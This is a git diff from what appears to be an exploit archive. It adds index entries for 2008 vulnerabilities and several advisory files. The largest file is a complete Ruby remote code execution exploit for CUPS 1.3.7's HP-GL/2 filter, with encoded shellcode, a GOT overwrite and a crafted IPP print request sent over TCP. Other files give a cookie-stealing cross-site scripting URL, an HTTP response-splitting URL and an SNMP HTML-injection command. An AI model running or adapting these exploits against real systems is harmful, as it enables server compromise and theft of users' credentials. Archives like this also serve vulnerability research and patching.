diff --git a/files.csv b/files.csv index f504aa7f6..eb8cc1d3b 100755 --- a/files.csv +++ b/files.csv @@ -29222,3 +29222,21 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0 32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0 +32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x HTTP Response Splitting Vulnerability",2008-10-05,"BugSec LTD",multiple,remote,0 +32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 'action' Parameter Cross Site Scripting Vulnerability",2008-10-05,"Mazin Faour",java,webapps,0 +32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 'phonebook.php' SQL Injection Vulnerability",2008-10-06,"Jaykishan Nirmal",windows,remote,0 +32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 'index.php' SQL Injection Vulnerability",2008-10-03,S_DLA_S,php,webapps,0 +32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass Vulnerability",2008-10-06,WHK,php,webapps,0 +32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32465,platforms/windows/remote/32465.pl,"Internet Download Manager <= 4.0.5 File Parsing Buffer Overflow Vulnerability",2008-10-06,Ciph3r,windows,remote,0 +32466,platforms/multiple/remote/32466.html,"Mozilla Firefox <= 3.0.3 Internet Shortcut Same Origin Policy Violation Vulnerability",2008-10-07,"Liu Die Yu",multiple,remote,0 +32467,platforms/php/webapps/32467.txt,"Opera Web Browser <= 8.51 URI Redirection Remote Code Execution Vulnerability",2008-10-08,MATASANOS,php,webapps,0 +32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 +32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point 'system.sysName.0' SNMP HTML Injection Vulnerability",2008-10-09,"Adrian Pastor",hardware,remote,0 +32470,platforms/linux/remote/32470.rb,"CUPS <= 1.3.7 'HP-GL/2' Filter Remote Code Execution Vulnerability",2008-10-09,regenrecht,linux,remote,0 +32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0 +32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability",2008-10-10,"Luca Carettoni",hardware,dos,0 +32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 +32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0 +32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0 diff --git a/platforms/hardware/dos/32472.txt b/platforms/hardware/dos/32472.txt new file mode 100755 index 000000000..82b733f72 --- /dev/null +++ b/platforms/hardware/dos/32472.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31703/info + +Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when handling malicious HTML files. + +A successful exploit of this issue allows remote attackers to consume excessive system resources in the affected browser, which will cause the application to crash and deny service to legitimate users. Attackers may also be able to run arbitrary code, but this has not been confirmed. + + \ No newline at end of file diff --git a/platforms/hardware/remote/32469.txt b/platforms/hardware/remote/32469.txt new file mode 100755 index 000000000..5c1751756 --- /dev/null +++ b/platforms/hardware/remote/32469.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31666/info + +The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Attacker-supplied HTML and script code would run in the context of the web interface of the affected device, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. + +This issue is reported in the Tsunami MP.11 Model 2411; additional products may also be vulnerable. + +$ snmpset -v1 -c public 192.168.1.100 sysName.0 s'">' \ No newline at end of file diff --git a/platforms/java/webapps/32459.txt b/platforms/java/webapps/32459.txt new file mode 100755 index 000000000..b0de0c467 --- /dev/null +++ b/platforms/java/webapps/32459.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31580/info + +Kontiki Delivery Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Kontiki Delivery Management System 5.0 and prior versions are vulnerable. + +http://www.example.com/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/linux/dos/32471.txt b/platforms/linux/dos/32471.txt new file mode 100755 index 000000000..0c63bfa0c --- /dev/null +++ b/platforms/linux/dos/32471.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31696/info + +KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code. + +An attacker may exploit this vulnerability to cause Konqueror to crash, resulting in denial-of-service conditions. + +The issue affects Konqueror 3.5.9; other versions may also be affected. + + \ No newline at end of file diff --git a/platforms/linux/remote/32470.rb b/platforms/linux/remote/32470.rb new file mode 100755 index 000000000..fc5cce548 --- /dev/null +++ b/platforms/linux/remote/32470.rb @@ -0,0 +1,185 @@ +source: http://www.securityfocus.com/bid/31688/info + +CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter. + +Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges. + +Successful remote exploits may require printer sharing to be enabled on the vulnerable system. + +The issue affects versions prior to CUPS 1.3.9. + +NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability. + +#!/usr/bin/ruby -w + +# CUPS 1.3.7 (HP-GL/2 filter) remote code execution +# gives uid=2(daemon) gid=7(lp) groups=7(lp) +# linux 2.6.25/randomize_va_space = 1, glibc 2.7 +# +# An Introduction to HP-GL/2 Graphics +# http://www.tech-diy.com/HP%20Graphics%20Language.htm +# Internet Printing Protocol/1.1: Encoding and Transport +# http://tools.ietf.org/html/rfc2910 +# Internet Printing Protocol/1.1: Model and Semantics +# http://tools.ietf.org/html/rfc2911 + +# :::::::::::::::::::::::::::::::::: setup :::::::::::::::::::::::::::::::::: + +host = '127.0.0.1' +port = 631 +printer = 'Virtual_Printer' + +Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$ +fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf + +# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com +# encoder=PexFnstenvSub, restricted chars: 0xff +shellcode = + "\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" + + "\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" + + "\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" + + "\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" + + "\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" + + "\xfc\x48\x22\xd6"; + +# :::::::::::::::::::::::::::::::::: code ::::::::::::::::::::::::::::::::::: + +# beacause of hpgl-attr.c:68-73 and 269-274 +def CR_setup() + "CR0,1,0,1,0,1;" +end + +# PS is a bit tricky here. final weight of pen (PW code) is calculated as: +# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0), +# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0. +# so, hoping to get things accurate I set multiplier to 1.0 +def PS_setup() + "WU1;" + # set the units used for pen widths + "RO0;" + # (do not) rotate the plot + "PS0,199.123455;"; # set the plot size +end + +# alternative approach to fight floating point rounding errors +# first one seems to be more successful, though +def PS_setup_alt() + "WU0;" + + "RO0;"; +end + +# set the pen width (PS!) +def PW(width, pen) + "PW#{width},#{pen};" +end + +def PW_alt(width, pen) + "PW#{width*25.4/72.0},#{pen};" +end + +# "Set the pen color..." +def PC(pen, r, g, b) + "PC#{pen},#{r},#{g},#{b};" +end + +# we'll be storing shellcode in Pens[1024] static buffer +# typedef struct +# { +# float rgb[3]; /* Pen color */ +# float width; /* Pen width */ +# } pen_t; +def memcpy(data) + while (data.length % 16 != 0) + data += "\x90"; + end + s = '' + a = 0, b = 0, i = 0 + data.unpack('f*').each { |f| + case ((i += 1) % 4) + when 1: a = f + when 2: b = f + when 3: s += PC(i/4, a, b, f) + else s += PW(f, (i-1)/4) + end + } + return s; +end + +# overwrite all 16 bytes with the same value +def poke(addr, value) + f = [value].pack('i').unpack('f') # floatyfication! + i = (addr-Pens_addr)/16 + return PC(i, f, f, f) + PW(f, i) +end + +hpgl_data = + "BP;" + # to be recognized by CUPS + CR_setup() + + PS_setup() + + memcpy(shellcode) + + poke(fprintf_got, Pens_addr) + + PC(0, 0, 0, 0); # whatever + +def attribute(tag, name, value) + [tag].pack('C') + + [name.length].pack('n') + + name + + [value.length].pack('n') + + value +end + +# tag - meaning (rfc2910#section-3.5) +# 0x42 nameWithoutLanguage +# 0x45 uri +# 0x47 charset +# 0x48 naturalLanguage +operation_attr = + attribute(0x47, 'attributes-charset', 'utf-8') + + attribute(0x48, 'attributes-natural-language', 'en-us') + + attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") + + attribute(0x42, 'job-name', 'zee greeteengz') + + attribute(0x42, 'document-format', 'application/vnd.hp-HPGL'); + +ipp_data = + "\x01\x00" + # version-number: 1.0 + "\x00\x02" + # operation-id: Print-job + "\x00\x00\x00\x01" + # request-id: 1 + "\x01" + # operation-attributes-tag + operation_attr + + "\x02" + # job-attributes-tag + "\x03" + # end-of-attributes-tag + hpgl_data; + +http_request = +"""POST /printers/#{printer} HTTP/1.1 +Content-Type: application/ipp +User-Agent: Internet Print Provider +Host: #{host} +Content-Length: #{ipp_data.length} +Connection: Keep-Alive +Cache-Control: no-cache +""" + +require 'socket' +NL = "\r\n" + +if (false) + # ./hpgltops 0 none none 1 '' output.hpgl + puts hpgl_data + puts "[+] dumping HP/GL-2 into output.hpgl" + f = File.new('output.hpgl', 'w') + f.write(hpgl_data) + f.close() + exit(0) +end + +puts "[+] connecting to #{host}:#{port}" +s = TCPSocket.open(host, port) +puts "[+] asking #{printer} for a printout" +http_request.each_line { |line| + s.write(line.strip + NL) +} +s.write(NL) +s.write(ipp_data) +s.read(1) +s.close() +puts "[+] done" + diff --git a/platforms/multiple/remote/32458.txt b/platforms/multiple/remote/32458.txt new file mode 100755 index 000000000..39ebdd699 --- /dev/null +++ b/platforms/multiple/remote/32458.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31577/info + +OpenNMS is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +Versions prior to OpenNMS 1.5.94 are vulnerable. + +http://www.example.com/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text +/html%0D%0AContent-Length:%2036%0D%0A%0D%0ABugSec